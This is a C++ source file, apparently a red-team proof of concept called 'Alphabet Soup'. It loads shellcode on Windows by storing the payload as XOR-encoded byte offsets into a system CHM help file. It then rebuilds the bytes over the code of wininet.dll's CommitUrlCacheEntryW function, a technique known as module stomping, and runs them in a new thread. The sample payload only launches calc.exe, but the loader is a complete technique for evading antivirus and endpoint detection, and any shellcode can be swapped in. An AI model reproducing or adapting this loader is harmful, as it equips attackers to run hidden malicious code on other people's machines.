/*
* local-injection-direct.cpp: Alphabet Soup Local Injection (Direct Mapping)
* shellcode: msfvenom -p windows/x64/exec CMD=calc.exe -f C EXITFUNC=thread
* compile: cl.exe local-injection.cpp /D"_UNICODE" /D"UNICODE" /W0
* Usage: local-injection.exe
*/
#include <windows.h>
#include <stdio.h>

// payload recipe generated by python helper
unsigned long long alphabetSoup[] = {
    4660, 18274, 19562, 67286, 67490, 82347, 58255, 55850, 11517, 78235, 11207, 67312,
    63106, 53765, 76979, 51487, 61601, 42896, 49663, 31257, 33927, 40826, 97872, 60471,
    39179, 80449, 30873, 55773, 73358, 18824, 84126, 43050, 48375, 36078, 69535, 55281,
    29350, 60425, 46156, 70929, 27331, 60546, 63514, 43138, 8061, 32171, 76749, 57105,
    40666, 42570, 54106, 5381, 26667, 96273, 23041, 20926, 45105, 83209, 43016, 36926,
    19584, 759, 31799, 96385, 29277, 71625, 658, 20898, 46156, 75091, 36562, 63217,
    32252, 18276, 20082, 46406, 96105, 97935, 69259, 82403, 67571, 12027, 14827, 10746,
    61409, 65527, 75011, 96596, 32632, 68718, 78104, 83115, 64316, 82052, 33768, 57141,
    72283, 41134, 95702, 84466, 85673, 3696, 26886, 96893, 39483, 23271, 41651, 3362,
    68468, 55281, 6720, 82986, 44277, 1705, 28515, 71249, 59249, 79327, 58868, 74132,
    49433, 19674, 22568, 43897, 33427, 31320, 88091, 34531, 64614, 45042, 95075, 76458,
    28307, 63163, 651, 33746, 38322, 2038, 42752, 51820, 67781, 61382, 67207, 16453,
    58890, 60662, 46979, 96290, 4814, 5913, 83115, 1403, 47113, 68324, 85603, 61391,
    80038, 88384, 26096, 25204, 52013, 1705, 35941, 94816, 54723, 36104, 72645, 33370,
    76112, 31968, 35382, 72858, 32662, 97875, 40082, 69989, 74486, 63000, 78699, 69751,
    51524, 18295, 57306, 64727, 47863, 40802, 16522, 24833, 32153, 88740, 40255, 18669,
    61227, 45792, 51937, 44065, 56572, 67775, 56860, 25498, 42171, 63173, 32571, 32622,
    18221, 29795, 7983, 10965, 11823, 9950, 11459, 11186, 13521, 11448, 87135, 54212,
    78303, 39710, 895, 16258, 64024, 23012, 43353, 53123, 97998, 82785, 79132, 78332,
    55762, 32453, 82913, 24997, 41308, 60233, 94286, 72408, 59332, 95692, 70915, 44640,
    86190, 30584, 46428, 86887, 25949, 83133, 26623, 55014, 25618, 61978, 27560, 35853,
    31974, 33604, 4916, 45041, 68947, 64535, 86981, 18318, 74405, 16233, 71645, 66637,
    39031, 74272, 21532, 94788, 3193, 5930, 3871, 78261, 56407, 33868, 56831, 4485,
    10670
};

const size_t soupSize = sizeof(alphabetSoup) / sizeof(unsigned long long);

int main() {
    printf("[*] Alphabet Soup PoC - Direct Injection\n");
    
    // Extract the key from the first element
    DWORD activeKey = (DWORD)alphabetSoup[0];
    size_t payloadSize = soupSize - 1; // Real shellcode size is total minus the key

    // Map the dictionary file (the source)
    HANDLE hFile = CreateFileA("C:\\Windows\\Help\\mui\\0409\\cliconf.chm", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    HANDLE hMap = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    LPVOID pChmBase = MapViewOfFile(hMap, FILE_MAP_READ, 0, 0, 0);

    // Locate target function for stomping
    HMODULE hBowlDll = LoadLibraryA("wininet.dll");
    LPVOID pStompTarget = (LPVOID)GetProcAddress(hBowlDll, "CommitUrlCacheEntryW");
    printf("[+] Target wininet.dll!CommitUrlCacheEntryW loaded at: : 0x%016llx\n", pStompTarget);

    // Change protection on target DLL memory to allow writing
    DWORD oldProtect;
    if (!VirtualProtect(pStompTarget, payloadSize, PAGE_READWRITE, &oldProtect)) {
        printf("[!] Failed to change memory protection.\n");
        return 1;
    }
    
    // Decode indices and write directly into the target DLL memory space
    printf("[*] Harvesting using Key: 0x%X\n", activeKey);        
    for (size_t i = 1; i < soupSize; i++) {
        // Decode the offset
        unsigned long long realOffset = alphabetSoup[i];
        if (activeKey != 0) { realOffset ^= activeKey; }
        *((BYTE*)pStompTarget + (i - 1)) = *((BYTE*)pChmBase + (DWORD)realOffset);
    }
    printf("[+] Target memory stomped.\n");

    // Execute
    VirtualProtect(pStompTarget, payloadSize, PAGE_EXECUTE_READ, &oldProtect);
    printf("[!] Launching thread...\n");
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pStompTarget, NULL, 0, NULL);

    if (hThread) {
        WaitForSingleObject(hThread, INFINITE);
    }

    // Cleanup
    UnmapViewOfFile(pChmBase);
    CloseHandle(hMap);
    CloseHandle(hFile);

    return 0;
}